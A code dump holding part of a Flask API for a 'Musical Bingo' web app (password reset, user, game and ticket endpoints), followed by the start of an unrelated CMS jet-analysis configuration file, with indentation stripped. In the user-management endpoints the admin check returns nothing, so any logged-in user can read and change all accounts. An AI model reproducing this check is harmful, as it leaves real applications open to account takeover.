return jsonify({"success": True, "token": token.to_dict()})
class DeleteGuestTokenApi(MethodView):
"""
API to delete a guest token is valid and create
guest accounts
"""
decorators = [jwt_required(optional=True), uses_database]
def delete(self, token: str) -> Response:
"""
Delete a guest token
"""
if not current_user.is_admin:
return jsonify_no_content(401)
db_token = cast(models.Token, models.Token.get(
db_session, jti=token, token_type=TokenType.GUEST.value))
if db_token is None:
return jsonify_no_content(404)
db_token.revoked = True
return jsonify_no_content(204)
class ResetPasswordUserApi(MethodView):
"""
API to allow a user to request a password reset and to
use the password reset link to choose a new password
"""
decorators = [get_options, uses_database]
def post(self) -> Response:
"""
Either request a password reset or confirm a password reset.
"""
if not request.json:
return jsonify_no_content(400)
email = request.json.get('email', None)
if not email:
return jsonify_no_content(400)
user = cast(models.User, models.User.get(db_session, email=email))
if not user:
# we don't divulge if the user really exists
response = {
"email": email,
"success": True,
}
return jsonify(response)
if 'token' in request.json:
return self.check_password_update(user)
return self.create_password_reset_token(user)
def check_password_update(self, user: models.User) -> Response:
"""
Check request to change password.
"""
response = {
"email": user.email,
"debug": "check_password_update",
"success": True,
}
try:
token = cast(JsonObject, request.json)['token']
password = cast(JsonObject, request.json)['password']
confirm = cast(JsonObject, request.json)['confirmPassword']
# TODO: use UTC
now = datetime.datetime.now()
if (password != confirm or
token != user.reset_token or
user.reset_expires < now):
response['error'] = 'Incorrect email address or the password reset link has expired'
response['success'] = False
else:
user.reset_expires = None
user.reset_token = None
user.set_password(password)
db_session.commit()
except KeyError as err:
response['success'] = False
response['error'] = f'Missing field {err}'
return jsonify(response)
def create_password_reset_token(self, user: models.User) -> Response:
"""
Create a random token and email a link using this token to
the registered email address. The email will contain both a
plain text and an HTML version.
"""
response = {
"email": user.email,
"success": True,
}
token_lifetime = current_app.config['PASSWORD_RESET_TOKEN_EXPIRES']
if isinstance(token_lifetime, int):
token_lifetime = datetime.timedelta(seconds=token_lifetime)
user.reset_expires = datetime.datetime.now() + token_lifetime
user.reset_token = secrets.token_urlsafe(16)
# pylint: disable=broad-except
try:
self.send_reset_email(user, token_lifetime)
except Exception as err:
response['error'] = type(err).__name__ + ": " + str(err)
response['success'] = False
return jsonify(response)
def send_reset_email(self, user: models.User, token_lifetime: datetime.timedelta) -> None:
"""
Send an email to the user to allow them to reset their password.
The email will contain both a plain text and an HTML version.
"""
settings = g.current_options.email_settings()
for option in ['server', 'port', 'sender', 'username', 'password']:
if not getattr(settings, option, None):
raise ValueError(f"Invalid SMTP settings: {option} is not set")
token_lifetime = current_app.config['PASSWORD_RESET_TOKEN_EXPIRES']
reply_to = settings.reply_to
if reply_to is None:
reply_to = settings.sender
context = {
'subject': 'Musical Bingo password reset request',
'time_limit': f'{token_lifetime.days} days',
'url': request.url_root,
'reply_to': reply_to,
'reset_link': urljoin(request.url_root,
url_for('reset_password', path=user.reset_token)),
}
message = MIMEMultipart("alternative")
message["Subject"] = context["subject"]
message["From"] = settings.sender
message["To"] = user.email
part1 = MIMEText(render_template(
'password-reset.txt', **context), "plain")
part2 = MIMEText(render_template(
'password-reset.html', **context), "html")
message.attach(part1)
message.attach(part2)
ssl_context = ssl.create_default_context()
if settings.starttls:
with smtplib.SMTP(settings.server, settings.port) as server:
#server.set_debuglevel(2)
server.ehlo_or_helo_if_needed()
server.starttls(context=ssl_context) # type: ignore
server.ehlo_or_helo_if_needed()
if settings.username:
assert settings.password is not None
server.login(settings.username, settings.password)
server.send_message(message, settings.sender, user.email)
else:
with smtplib.SMTP_SSL(settings.server, settings.port, context=ssl_context) as server:
# server.set_debuglevel(2)
server.ehlo_or_helo_if_needed()
if settings.username:
assert settings.password is not None
server.login(settings.username, settings.password)
server.send_message(message, settings.sender, user.email)
class ModifyUserApi(MethodView):
"""
API to allow a user to modifier their own account
"""
decorators = [jwt_required(), uses_database]
def post(self) -> Response:
"""
Modify the user's own password or email
"""
if not request.json:
return jsonify_no_content(400)
response = {
"email": current_user.email,
"success": True,
}
try:
email = request.json['email']
current_password = request.json['existingPassword']
password = request.json['password']
confirm = request.json['confirmPassword']
if not current_user.check_password(current_password):
response["success"] = False
response["error"] = "Existing password did not match"
elif password != confirm:
response["success"] = False
response["error"] = "New passwords do not match"
else:
current_user.set_password(password)
current_user.email = email
response["email"] = email
db_session.commit()
except KeyError as err:
response['success'] = False
response['error'] = f'Missing field {err}'
return jsonify(response)
class UserManagmentApi(MethodView):
"""
Admin API to view and modify all users
"""
decorators = [jwt_required(), uses_database]
def get(self) -> Response:
"""
Get the list of registered users
"""
if not current_user.is_admin:
jsonify_no_content(401)
users = []
for user in models.User.all(db_session):
item = user.to_dict(exclude={'password', 'groups_mask'})
item['groups'] = [g.name.lower() for g in user.groups]
users.append(item)
return jsonify(users)
def post(self) -> Response:
"""
Add, modify or delete users
"""
if not current_user.is_admin:
jsonify_no_content(401)
if not request.json:
return jsonify_no_content(400)
result: JsonObject = {
"errors": [],
"added": [],
"modified": [],
"deleted": []
}
for idx, item in enumerate(request.json):
self.modify_user(result, idx, item)
return jsonify(result)
@staticmethod
def modify_user(result: JsonObject, idx: int, item: JsonObject) -> None:
"""
Modify the settings of the specified user
"""
try:
pk = item['pk']
deleted = item['deleted']
username = item['username']
email = item['email']
groups = item['groups']
except KeyError as err:
result["errors"].append(f"{idx}: Missing field {err}")
return
password = item.get('password', None)
if item.get('newUser', False):
user = models.User(email=email, username=username)
user.set_password(password)
user.set_groups(groups)
db_session.add(user)
db_session.flush()
pk = user.pk
result["added"].append({'username': username, 'pk': pk})
return
user = cast(models.User, models.User.get(db_session, pk=pk))
if user is None:
result["errors"].append(f"{idx}: Unknown user {pk}")
return
if deleted:
db_session.delete(user)
result['deleted'].append(pk)
return
modified = False
if username != user.username:
if models.User.exists(db_session, username=username):
result["errors"].append(
f"{idx}: Username {username} already present")
else:
user.username = username
modified = True
if email != user.email:
if models.User.exists(db_session, email=email):
result["errors"].append(
f"{idx}: Email {email} already present")
else:
user.email = email
modified = True
group_mask = user.groups_mask
user.set_groups(groups)
if group_mask != user.groups_mask:
modified = True
if password:
user.set_password(password)
modified = True
if modified:
result['modified'].append(pk)
class RefreshApi(MethodView):
"""
API to request a new access token from a refresh token
"""
decorators = [jwt_required(refresh=True), uses_database]
def post(self):
"""
generate a new access token from a refresh token
"""
username = get_jwt_identity()
if not models.db.User.exists(db_session, username=username):
return jsonify_no_content(401)
ret = {
'accessToken': create_access_token(identity=username)
}
return jsonify(ret, 200)
def decorate_game(game: models.Game, with_count: bool = False) -> models.JsonObject:
"""
Convert game into a dictionary and add extra fields
"""
js_game = game.to_dict()
if with_count:
# pylint: disable=no-member
js_game['userCount'] = cast(models.DatabaseSession, db_session).query(
models.BingoTicket).filter(
models.BingoTicket.user == current_user,
models.BingoTicket.game == game).count()
assert g.current_options is not None
opts = game.game_options(cast(Options, g.current_options))
js_game['options'] = opts
palette = Palette.from_string(opts['colour_scheme'])
btk = BingoTicket(palette=palette, columns=opts['columns'])
backgrounds: List[str] = []
for row in range(opts['rows']):
for col in range(opts['columns']):
backgrounds.append(btk.box_colour_style(col, row).css())
js_game['options']['backgrounds'] = backgrounds
return js_game
class WorkerMultipartResponse:
"""
Provides streamed response with current progress of the
worker thread.
This must be used with a multipart/mixed content type.
It will generate a application/json entity at regular
intervals that contains the current progress of this
import.
"""
def __init__(self, worker_type: Type[workers.BackgroundWorker], filename: str,
data: JsonObject):
self.done = False
self.first_response = True
self.result: Optional[workers.DbIoResult] = None
args = (Path(filename), data,)
# pylint: disable=no-member
options = Options(**cast(Options, g.current_options).to_dict())
self.worker = worker_type(args, options, self.import_done)
self.boundary = secrets.token_urlsafe(16).replace('-', '')
self.errors: List[str] = []
def add_error(self, error: str) -> None:
"""
Add an error message
This error will be included in the next progress report
"""
self.errors.append(error)
def generate(self):
"""
Generator that yields the current import progress
"""
if not self.done:
self.worker.start()
min_pct = 1.0
while not self.done and not self.worker.progress.abort:
time.sleep(0.5)
if not self.worker.bg_thread.is_alive():
self.worker.bg_thread.join()
self.worker.finalise(self.worker.result)
self.done = True
continue
progress = {
"errors": self.errors,
"text": self.worker.progress.text,
"pct": self.worker.progress.total_percentage,
"phase": self.worker.progress.current_phase,
"numPhases": self.worker.progress.num_phases,
"done": False,
}
if self.worker.progress.total_percentage <= min_pct and not self.done:
continue
self.errors = []
min_pct = self.worker.progress.total_percentage + 1.0
yield self.create_response(progress)
progress = {
"errors": self.errors,
"text": self.worker.progress.text,
"pct": 100.0,
"phase": self.worker.progress.current_phase,
"numPhases": self.worker.progress.num_phases,
"done": True,
"success": False
}
if self.worker.result:
progress["added"] = self.worker.result.added
progress["keys"] = {}
for table, count in self.worker.result.added.items():
progress["keys"][table] = self.worker.result.pk_maps[table]
if count > 0:
progress["success"] = True
yield self.create_response(progress, True)
def create_response(self, data, last=False):
"""
Create a multipart response
"""
encoded = bytes(json.dumps(data, default=utils.flatten), 'utf-8')
leng = len(encoded)
closed = b'Connection: close\r\n' if last else b''
lines = [
b'',
bytes(f'--{self.boundary}', 'ascii'),
b'Content-Type: application/json',
bytes(f'Content-Length: {leng}', 'ascii'),
closed,
encoded,
]
if self.first_response:
self.first_response = False
lines.pop(0)
if last:
lines.append(bytes(f'--{self.boundary}--\r\n', 'ascii'))
return b'\r\n'.join(lines)
def import_done(self, result: workers.DbIoResult) -> None:
"""
Called when import has completed
"""
self.result = result
self.done = True
class ExportDatabaseGenerator:
"""
Yields output of the export process without loading entire database into memory
"""
def generate(self, opts: JsonObject):
"""
Generator that yields the output of the export process
"""
assert opts is not None
yield b'{\n"Options":'
yield bytes(
json.dumps(opts, indent=' ', default=utils.flatten, sort_keys=True),
'utf-8')
yield b',\n'
tables = [models.User, models.Artist, models.Album, models.Directory,
models.Song, models.Game, models.Track, models.BingoTicket]
for table in tables:
yield bytes(f'"{table.__plural__}":', 'utf-8') # type: ignore
contents = []
with models.db.session_scope() as dbs:
for item in table.all(dbs): # type: ignore
data = item.to_dict(with_collections=True)
contents.append(data) # type: ignore
yield bytes(
json.dumps(contents, indent=' ', default=utils.flatten, sort_keys=True),
'utf-8')
if table != tables[-1]:
yield b','
yield b'\n'
yield b'}\n'
class DatabaseApi(MethodView):
"""
API for importing and exporting entire database
"""
decorators = [get_options, jwt_required(), uses_database]
def get(self) -> Response:
"""
Export database to a JSON file.
The data is streamed to the client to avoid having to
create the entire database JSON object in memory
"""
gen = ExportDatabaseGenerator()
opts = g.current_options.to_dict(
exclude={'command', 'exists', 'jsonfile', 'database', 'debug',
'game_id', 'title', 'mp3_editor', 'mode', 'smtp',
'secret_key'})
clips = g.current_options.clips()
try:
opts['clip_directory'] = cast(Path, clips).resolve().as_posix()
except AttributeError:
# PurePosixPath and PureWindowsPath don't have the resolve() function
opts['clip_directory'] = clips.as_posix()
return Response(gen.generate(opts),
direct_passthrough=True,
mimetype='application/json; charset=utf-8')
def put(self) -> Response:
"""
Import database
"""
if not request.json:
return jsonify_no_content(400)
if not current_user.is_admin:
return jsonify_no_content(401)
try:
data = request.json['data']
filename = request.json['filename']
except KeyError:
return jsonify_no_content(400)
imp_resp = WorkerMultipartResponse(workers.ImportDatabase, filename, data)
try:
validate_json(JsonSchema.DATABASE, data)
except fastjsonschema.JsonSchemaException as err:
imp_resp.add_error('Not a valid database file')
# pylint: disable=no-member
imp_resp.add_error(err.message)
imp_resp.done = True
return Response(imp_resp.generate(),
direct_passthrough=True,
mimetype=f'multipart/mixed; boundary={imp_resp.boundary}')
class ListDirectoryApi(MethodView):
"""
API for listing all directories
"""
decorators = [get_options, jwt_required(), uses_database]
def get(self) -> Response:
"""
Returns a list of all directories
"""
if not current_user.has_permission(models.Group.CREATORS):
return jsonify_no_content(401)
return jsonify([
mdir.to_dict(with_collections=True) for mdir in models.Directory.all(db_session)
])
class DirectoryDetailsApi(MethodView):
"""
API for listing all directories
"""
decorators = [get_directory, get_options, jwt_required(), uses_database]
def get(self, dir_pk: int) -> Response:
"""
Returns details of the specified directory
"""
if not current_user.has_permission(models.Group.CREATORS):
return jsonify_no_content(401)
retval = g.current_directory.to_dict(with_collections=True, exclude={'songs'})
songs = []
for song in g.current_directory.songs:
item = song.to_dict(exclude={'artist', 'album'})
item['artist'] = song.artist.name if song.artist is not None else ''
item['album'] = song.album.name if song.album is not None else ''
songs.append(item)
retval['songs'] = songs
return jsonify(retval)
class ListGamesApi(MethodView):
"""
API for listing all games
"""
decorators = [get_options, jwt_required(), uses_database]
def get(self) -> Response:
"""
Returns a list of all past and upcoming games
"""
now = datetime.datetime.now()
today = now.replace(hour=0, minute=0)
end = now + datetime.timedelta(days=7)
if current_user.is_admin:
games = models.Game.all(db_session).order_by(models.Game.start)
else:
games = db_session.query(models.Game).\
filter(models.Game.start <= end).\
order_by(models.Game.start)
future = []
past = []
for game in games:
if isinstance(game.start, str):
game.start = utils.parse_date(game.start)
if isinstance(game.end, str):
game.end = utils.parse_date(game.end)
js_game = decorate_game(game, with_count=True)
if game.start >= today and game.end > now:
future.append(js_game)
else:
past.append(js_game)
return jsonify({'games': future, 'past': past})
def put(self) -> Response:
"""
Import a game
"""
if not request.json:
return jsonify_no_content(400)
if not current_user.is_admin:
return jsonify_no_content(401)
try:
data = request.json['data']
filename = request.json['filename']
except KeyError:
return jsonify_no_content(400)
imp_resp = WorkerMultipartResponse(workers.ImportGameTracks, filename, data)
try:
validate_json(JsonSchema.GAME_TRACKS, data)
except fastjsonschema.JsonSchemaException as err:
imp_resp.add_error('Not a valid gameTracks file')
# pylint: disable=no-member
imp_resp.add_error(err.message)
imp_resp.done = True
return Response(imp_resp.generate(),
direct_passthrough=True,
mimetype=f'multipart/mixed; boundary={imp_resp.boundary}')
class GameDetailApi(MethodView):
"""
API for extended detail about a game and modification of a game
"""
decorators = [get_game, get_options, jwt_required(), uses_database]
def get(self, game_pk: int) -> Response:
"""
Get the extended detail for a game.
For a game host, this detail will include the complete track listing.
"""
now = datetime.datetime.now()
data = decorate_game(g.current_game)
data['tracks'] = []
if g.current_game.end < now or current_user.has_permission(
models.Group.HOSTS):
for track in g.current_game.tracks: # .order_by(models.Track.number):
trk = {
'artist': '',
'album': '',
'duration': track.song.duration,
'song': track.song.pk,
'title': track.song.title,
}
if track.song.artist is not None:
trk['artist'] = track.song.artist.name
if track.song.album is not None:
trk['album'] = track.song.album.name
trk.update(track.to_dict(only=['pk', 'number', 'start_time']))
data['tracks'].append(trk)
return jsonify(data)
def post(self, game_pk: int) -> Response:
"""
Modify a game
"""
if not current_user.is_admin:
return jsonify_no_content(401)
if not request.json:
return jsonify_no_content(400)
result: JsonObject = {}
try:
start = utils.make_naive_utc(cast(
datetime.datetime,
utils.from_isodatetime(request.json['start'])))
end = utils.make_naive_utc(cast(
datetime.datetime,
utils.from_isodatetime(request.json['end'])))
changes = {
'start': start,
'end': end,
'title': request.json['title'],
}
except (KeyError, ValueError) as err:
result = {
'success': False,
'error': err
}
return jsonify(result, 400)
if changes['start'] > changes['end']:
result = {
'success': False,
'error': 'Start must be less than end'
}
else:
result = {
'success': True,
}
game = g.current_game
game.set(**changes)
if 'options' in request.json:
opts = game.game_options(g.current_options)
opts.update(request.json['options'])
game.options = opts
# NOTE: deprecated, request should use an 'options' object
if 'colour_scheme' in request.json:
opts = game.game_options(g.current_options)
opts['colour_scheme'] = request.json['colour_scheme']
game.options = opts
result['game'] = decorate_game(game, True)
return jsonify(result)
def delete(self, **kwargs) -> Response:
"""
Delete a game
"""
# TODO: decide which roles are allowed to delete a game
if not current_user.is_admin:
return jsonify_no_content(401)
db_session.delete(g.current_game)
return jsonify_no_content(204)
class ExportGameApi(MethodView):
"""
Export a game to a JSON file
"""
decorators = [get_game, get_options, jwt_required(), uses_database]
def get(self, game_pk: int) -> Response:
"""
Export a game to a JSON file
"""
data = models.export_game_to_object(
g.current_game.id, db_session)
return jsonify(data)
class TicketsApi(MethodView):
"""
API for information about one or more Bingo tickets
"""
decorators = [get_options, get_game, jwt_required(), uses_database]
def get(self, game_pk: int, ticket_pk: Optional[int] = None) -> Response:
"""
get list of tickets for a game or detail for one ticket
"""
if ticket_pk is not None:
return self.get_ticket_detail(ticket_pk)
return self.get_ticket_list()
def get_ticket_list(self) -> Response:
"""
Get the list of Bingo tickets for the specified game.
"""
tickets: List[Dict[str, Any]] = []
if current_user.is_admin:
game_tickets = g.current_game.bingo_tickets.order_by(
models.BingoTicket.number)
else:
game_tickets = g.current_game.bingo_tickets
for ticket in game_tickets:
tck = {
'pk': ticket.pk,
'number': ticket.number,
'game': ticket.game_pk,
'checked': ticket.checked,
}
tck['user'] = ticket.user_pk if ticket.user is not None else None
tickets.append(tck)
return jsonify(tickets)
def get_ticket_detail(self, ticket_pk: int) -> Response:
"""
Get the detailed information for a Bingo Ticket.
"""
ticket = cast(models.BingoTicket, models.BingoTicket.get(
db_session, game=g.current_game, pk=ticket_pk))
if ticket is None:
return jsonify({'error': 'Not found'}, 404)
if ticket.user != current_user and not current_user.has_permission(
models.Group.HOSTS):
response = jsonify({'error': 'Not authorised'})
response.status_code = 401
return response
tracks: List[JsonObject] = []
for track in ticket.get_tracks(db_session):
trk = {
'artist': track.song.artist.name,
'title': track.song.title
}
tracks.append(trk)
card = ticket.to_dict(exclude={'order', 'tracks', 'fingerprint'})
card['tracks'] = tracks
return jsonify(card)
def put(self, game_pk: int, ticket_pk: Optional[int] = None) -> Response:
"""
claim a ticket for this user
"""
ticket: Optional[models.BingoTicket] = None
if ticket_pk is not None:
ticket = cast(Optional[models.BingoTicket], models.BingoTicket.get(
db_session, game=g.current_game, pk=ticket_pk))
if ticket is None:
return jsonify_no_content(404)
if not ticket.user:
ticket.user = current_user
return jsonify_no_content(201)
if ticket.user != current_user:
# ticket already taken
return jsonify_no_content(406)
return jsonify_no_content(200)
def delete(self, game_pk, ticket_pk=None) -> Response:
"""
release a ticket for this user
"""
ticket: Optional[models.BingoTicket] = None
if ticket_pk is not None:
ticket = cast(Optional[models.BingoTicket], models.BingoTicket.get(
db_session, game=g.current_game, pk=ticket_pk))
if ticket is None:
return jsonify_no_content(404)
if not ticket.user:
return jsonify_no_content(204)
if ticket.user.pk != current_user.pk and not current_user.has_permission(
models.Group.HOSTS):
return jsonify_no_content(401)
ticket.user = None
return jsonify_no_content(204)
class TicketsStatusApi(MethodView):
"""
Get information on which tickets have already been claimed and which
ones are still available.
"""
decorators = [get_game, jwt_required(), uses_database]
def get(self, game_pk: int) -> Response:
"""
Get information on which tickets have already been claimed and which
ones are still available.
"""
claimed: Dict[int, Optional[int]] = {}
for ticket in g.current_game.bingo_tickets:
if ticket.user is not None:
claimed[ticket.pk] = ticket.user.pk
else:
claimed[ticket.pk] = None
return jsonify({"claimed": claimed})
class CheckCellApi(MethodView):
"""
API to set and clear individual cells in a Bingo ticket
"""
decorators = [get_options, get_ticket, get_game, jwt_required(), uses_database]
def put(self, number: int, **kwargs) -> Response:
"""
set the check mark on a ticket.
Only the owner of the ticket or a host can change this.
"""
if number < 0 or number >= (g.current_options.columns * g.current_options.rows):
return jsonify_no_content(404)
g.current_ticket.checked |= (1 << number)
return jsonify_no_content(204)
def delete(self, number: int, **kwargs) -> Response:
"""
clear the check mark on a ticket.
Only the owner of the ticket or a host can change this.
"""
if number < 0 or number >= (g.current_options.columns * g.current_options.rows):
return jsonify_no_content(404)
g.current_ticket.checked &= ~(1 << number)
return jsonify_no_content(204)
class SongApi(MethodView):
"""
API to query songs in the database
"""
decorators = [jwt_required(), uses_database]
def get(self, dir_pk: Optional[int] = None, **kwargs) -> Response:
"""
Search for songs in the database.
If dir_pk is provided, only search within that directory
"""
result: List[JsonObject] = []
db_query = db_session.query(models.Song)
if dir_pk is not None:
db_query = db_query.filter_by(directory_pk=dir_pk)
try:
# if q CGI parameter is provided, it performs a
# case insensitive search of both title and artist
query = request.args['q']
artists = db_session.query(models.Artist.pk).filter(
models.Artist.name.ilike(f"%{query}%"))
db_query = db_query.filter(or_(
models.Song.title.ilike(f"%{query}%"),
models.Song.artist_pk.in_(artists)
))
except KeyError:
pass
for song in db_query:
item = song.to_dict(exclude={'artist', 'album'})
item['artist'] = song.artist.name
item['album'] = song.album.name
result.append(item)
return jsonify(result)
class SettingsApi(MethodView):
"""
Admin API to view and modify settings
"""
decorators = [get_options, jwt_required(optional=True), uses_database]
def is_admin(self) -> bool:
"""
Check if a user is logged in, and is an admin
"""
username = get_jwt_identity()
if not username:
return False
user = cast(models.User, models.User.get(db_session, username=username))
if user is None:
return False
return user.is_admin
def get(self) -> Response:
"""
Get the current settings
"""
if not self.is_admin():
result = {
'privacy': self.translate_options(g.current_options.privacy)
}
else:
result = {
'app': self.translate_options(g.current_options),
}
for ext_cls in g.current_options.EXTRA_OPTIONS:
ext_opts = cast(ExtraOptions,
getattr(g.current_options, ext_cls.LONG_PREFIX))
result[ext_cls.LONG_PREFIX] = self.translate_options(ext_opts)
return jsonify(result)
@staticmethod
def translate_options(options: Union[Options, ExtraOptions]) -> List[JsonObject]:
"""
Convert the specifies options into a JSON array using
JavaScript types for each field
"""
opts = options.to_dict()
result: List[JsonObject] = []
for field in options.OPTIONS:
item = {
'help': field.help,
'name': field.name,
'title': field.name.replace('_', ' ').title(),
'value': opts[field.name]
}
# pylint: disable=comparison-with-callable
if field.name == 'mp3_editor':
# TODO: Find a more generic solution
item['choices'] = MP3Factory.available_editors()
item['type'] = 'enum'
elif field.ftype == bool:
item['type'] = 'bool'
elif field.ftype == int:
item['type'] = 'int'
item['minValue'] = field.min_value
item['maxValue'] = field.max_value
elif field.ftype == str:
item['type'] = 'text'
elif field.ftype == json.loads:
item['type'] = 'json'
if item['value'] is not None:
item['value'] = json.dumps(item['value'])
elif isinstance(field.ftype, EnumWrapper):
item['type'] = 'enum'
item['choices'] = field.ftype.names()
item['value'] = item['value'].name
result.append(item)
return result
def post(self) -> Response:
"""
Modify the current settings
"""
if not self.is_admin():
return jsonify_no_content(401)
if not request.json:
return jsonify_no_content(400)
modified_fields: Set[str] = set()
changes: JsonObject = {}
for section, items in request.json.items():
try:
sch = self.process_section_changes(section, items)
if section == 'app':
changes.update(sch)
else:
changes[section] = sch
for field in sch:
modified_fields.add(f'{section}.{field}')
except ValueError as err:
return jsonify({
'success': False,
'error': str(err)
})
g.current_options.update(**changes)
return jsonify({
'success': True,
'changes': sorted(list(modified_fields))
})
def process_section_changes(self, section: str, items: JsonObject) -> JsonObject:
"""
Process the requested changes for the given settings section
"""
changes: JsonObject = {}
opt_map: Dict[str, OptionField] = {}
if section == 'app':
opts: List[OptionField] = Options.OPTIONS
else:
opts = cast(ExtraOptions, getattr(g.current_options, section)).OPTIONS
for field in opts:
opt_map[field.name] = field
for name, value in items.items():
try:
field = opt_map[name]
except KeyError as err:
raise ValueError(f'Invalid field {name}') from err
if field.ftype == int:
if value is None:
raise ValueError(f'Invalid None value for field {name}')
if not isinstance(value, int):
raise ValueError(f'Invalid type {type(value)} for field {name}')
if field.min_value is not None and value < field.min_value:
raise ValueError(
(f'Invalid value {value} for field {name} '+
f'(min={field.min_value})'))
if field.max_value is not None and value > field.max_value:
raise ValueError(
(f'Invalid value {value} for field {name} '+
f'(max={field.max_value})'))
changes[name] = value
return changes
| [
"[email protected]"
] | |
d7e812f6c4172330edf6c5665208f768736883fb | 89f4284d0b5b2359c5121626e1575f95fc08a160 | /HeavyIonsAnalysis/JetAnalysis/python/jets/ak1PFJetSequence_pponPbPb_jec_cff.py | 1566b9cba8fbfa5028007b4a3d4b3932de46e4ab | [] | no_license | geun-woo/Comparing-collections-in-AOD-and-in-miniAOD | e11eb48cc8ab15a07f02a08a8a46dfd9d5a4e418 | 7b6e2118b9ce733b2ebb6f26516cbc107e37b285 | refs/heads/main | 2023-01-27T21:18:37.980241 | 2020-12-04T08:24:01 | 2020-12-04T08:24:01 | 318,445,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,268 | py | import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.mcMatchLayer0.jetMatch_cfi import patJetGenJetMatch, patJetPartonMatch
from PhysicsTools.PatAlgos.recoLayer0.jetCorrFactors_cfi import patJetCorrFactors
from PhysicsTools.PatAlgos.producersLayer1.jetProducer_cfi import patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
ak1PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak1PFJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
ak1PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("ak1HiSignalGenJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
ak1PFparton = patJetPartonMatch.clone(
src = cms.InputTag("ak1PFJets"),
matched = cms.InputTag("hiSignalGenParticles"))
ak1PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
levels = cms.vstring('L2Relative'),
src = cms.InputTag("ak1PFJets"),
payload = "AK1PF"
)
ak1PFJetID = cms.EDProducer(
'JetIDProducer',
JetIDParams,
src = cms.InputTag('ak1CaloJets'))
# ak1PFclean = heavyIonCleanedGenJets.clone(
# src = cms.InputTag('ak1HiSignalGenJets'))
ak1PFbTagger = bTaggers(
"ak1PF",
0.1)
# create objects locally since they dont load properly otherwise
ak1PFPatJetPartons = ak1PFbTagger.PatJetPartons
ak1PFJetTracksAssociatorAtVertex = ak1PFbTagger.JetTracksAssociatorAtVertex
ak1PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
ak1PFSimpleSecondaryVertexHighEffBJetTags = ak1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak1PFSimpleSecondaryVertexHighPurBJetTags = ak1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak1PFCombinedSecondaryVertexBJetTags = ak1PFbTagger.CombinedSecondaryVertexBJetTags
ak1PFCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.CombinedSecondaryVertexV2BJetTags
ak1PFJetBProbabilityBJetTags = ak1PFbTagger.JetBProbabilityBJetTags
ak1PFSoftPFMuonByPtBJetTags = ak1PFbTagger.SoftPFMuonByPtBJetTags
ak1PFSoftPFMuonByIP3dBJetTags = ak1PFbTagger.SoftPFMuonByIP3dBJetTags
ak1PFTrackCountingHighEffBJetTags = ak1PFbTagger.TrackCountingHighEffBJetTags
ak1PFTrackCountingHighPurBJetTags = ak1PFbTagger.TrackCountingHighPurBJetTags
ak1PFImpactParameterTagInfos = ak1PFbTagger.ImpactParameterTagInfos
ak1PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
ak1PFJetProbabilityBJetTags = ak1PFbTagger.JetProbabilityBJetTags
ak1PFSecondaryVertexTagInfos = ak1PFbTagger.SecondaryVertexTagInfos
ak1PFSimpleSecondaryVertexHighEffBJetTags = ak1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak1PFSimpleSecondaryVertexHighPurBJetTags = ak1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak1PFCombinedSecondaryVertexBJetTags = ak1PFbTagger.CombinedSecondaryVertexBJetTags
ak1PFCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.CombinedSecondaryVertexV2BJetTags
ak1PFSecondaryVertexNegativeTagInfos = ak1PFbTagger.SecondaryVertexNegativeTagInfos
ak1PFNegativeSimpleSecondaryVertexHighEffBJetTags = ak1PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
ak1PFNegativeSimpleSecondaryVertexHighPurBJetTags = ak1PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
ak1PFNegativeCombinedSecondaryVertexBJetTags = ak1PFbTagger.NegativeCombinedSecondaryVertexBJetTags
ak1PFPositiveCombinedSecondaryVertexBJetTags = ak1PFbTagger.PositiveCombinedSecondaryVertexBJetTags
ak1PFNegativeCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
ak1PFPositiveCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
ak1PFSoftPFMuonsTagInfos = ak1PFbTagger.SoftPFMuonsTagInfos
ak1PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
ak1PFSoftPFMuonBJetTags = ak1PFbTagger.SoftPFMuonBJetTags
ak1PFSoftPFMuonByIP3dBJetTags = ak1PFbTagger.SoftPFMuonByIP3dBJetTags
ak1PFSoftPFMuonByPtBJetTags = ak1PFbTagger.SoftPFMuonByPtBJetTags
ak1PFNegativeSoftPFMuonByPtBJetTags = ak1PFbTagger.NegativeSoftPFMuonByPtBJetTags
ak1PFPositiveSoftPFMuonByPtBJetTags = ak1PFbTagger.PositiveSoftPFMuonByPtBJetTags
ak1PFPatJetFlavourAssociation = ak1PFbTagger.PatJetFlavourAssociation
ak1PFPatJetFlavourId = cms.Sequence(ak1PFPatJetPartons*ak1PFPatJetFlavourAssociation)
ak1PFJetBtaggingIP = cms.Sequence(
ak1PFImpactParameterTagInfos *
ak1PFTrackCountingHighEffBJetTags +
ak1PFTrackCountingHighPurBJetTags +
ak1PFJetProbabilityBJetTags +
ak1PFJetBProbabilityBJetTags
)
ak1PFJetBtaggingSV = cms.Sequence(
ak1PFImpactParameterTagInfos *
ak1PFSecondaryVertexTagInfos *
ak1PFSimpleSecondaryVertexHighEffBJetTags +
ak1PFSimpleSecondaryVertexHighPurBJetTags +
ak1PFCombinedSecondaryVertexBJetTags +
